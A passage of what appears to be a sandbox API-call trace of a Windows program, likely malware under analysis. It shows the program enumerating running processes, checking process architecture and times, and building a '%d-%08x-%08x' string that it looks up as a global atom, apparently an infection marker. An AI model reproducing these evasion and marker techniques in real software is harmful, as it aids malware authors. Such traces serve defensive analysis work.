	[0133.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.326] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.326] CloseHandle (hObject=0x2dc) returned 1
	[0133.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.327] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.327] CloseHandle (hObject=0x2dc) returned 1
	[0133.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0133.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.327] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.327] CloseHandle (hObject=0x2dc) returned 1
	[0133.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.328] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.328] CloseHandle (hObject=0x2dc) returned 1
	[0133.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.328] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.328] CloseHandle (hObject=0x2dc) returned 1
	[0133.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.329] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.329] CloseHandle (hObject=0x2dc) returned 1
	[0133.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.329] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.329] CloseHandle (hObject=0x2dc) returned 1
	[0133.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.329] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.329] CloseHandle (hObject=0x2dc) returned 1
	[0133.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.330] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.330] CloseHandle (hObject=0x2dc) returned 1
	[0133.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.330] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.330] CloseHandle (hObject=0x2dc) returned 1
	[0133.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.331] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.331] CloseHandle (hObject=0x2dc) returned 1
	[0133.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.331] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.331] CloseHandle (hObject=0x2dc) returned 1
	[0133.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.332] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.332] CloseHandle (hObject=0x2dc) returned 1
	[0133.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0133.332] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.332] CloseHandle (hObject=0x2dc) returned 1
	[0133.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0133.333] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.333] CloseHandle (hObject=0x2dc) returned 1
	[0133.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.333] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.333] CloseHandle (hObject=0x2dc) returned 1
	[0133.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.334] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.334] CloseHandle (hObject=0x2dc) returned 1
	[0133.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.334] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.334] CloseHandle (hObject=0x2dc) returned 1
	[0133.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.334] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.334] CloseHandle (hObject=0x2dc) returned 1
	[0133.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.335] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.335] CloseHandle (hObject=0x2dc) returned 1
	[0133.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.335] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.335] CloseHandle (hObject=0x2dc) returned 1
	[0133.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.336] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.336] CloseHandle (hObject=0x2dc) returned 1
	[0133.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0133.336] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.336] CloseHandle (hObject=0x2dc) returned 1
	[0133.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.336] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.337] CloseHandle (hObject=0x2dc) returned 1
	[0133.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.337] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.337] CloseHandle (hObject=0x2dc) returned 1
	[0133.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.337] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.337] CloseHandle (hObject=0x2dc) returned 1
	[0133.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.338] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.338] CloseHandle (hObject=0x2dc) returned 1
	[0133.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.338] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.338] CloseHandle (hObject=0x2dc) returned 1
	[0133.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0133.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.339] CloseHandle (hObject=0x2dc) returned 1
	[0133.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0133.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.339] CloseHandle (hObject=0x2dc) returned 1
	[0133.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.339] GetLastError () returned 0x5
	[0133.339] GetLastError () returned 0x5
	[0133.339] GetLastError () returned 0x5
	[0133.339] GetLastError () returned 0x5
	[0133.339] GetLastError () returned 0x5
	[0133.339] GetLastError () returned 0x5
	[0133.339] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.340] GetLastError () returned 0x5
	[0133.341] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.341] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0133.341] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] GetLastError () returned 0x5
	[0133.341] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.342] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.343] GetLastError () returned 0x5
	[0133.344] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.344] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0133.344] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.344] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0133.344] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0133.344] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0133.344] CloseHandle (hObject=0x2dc) returned 1
	[0133.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0133.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.345] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.345] CloseHandle (hObject=0x2dc) returned 1
	[0133.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.345] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.345] CloseHandle (hObject=0x2dc) returned 1
	[0133.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.346] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.346] CloseHandle (hObject=0x2dc) returned 1
	[0133.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.346] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.346] CloseHandle (hObject=0x2dc) returned 1
	[0133.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0133.346] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.346] CloseHandle (hObject=0x2dc) returned 1
	[0133.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0133.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
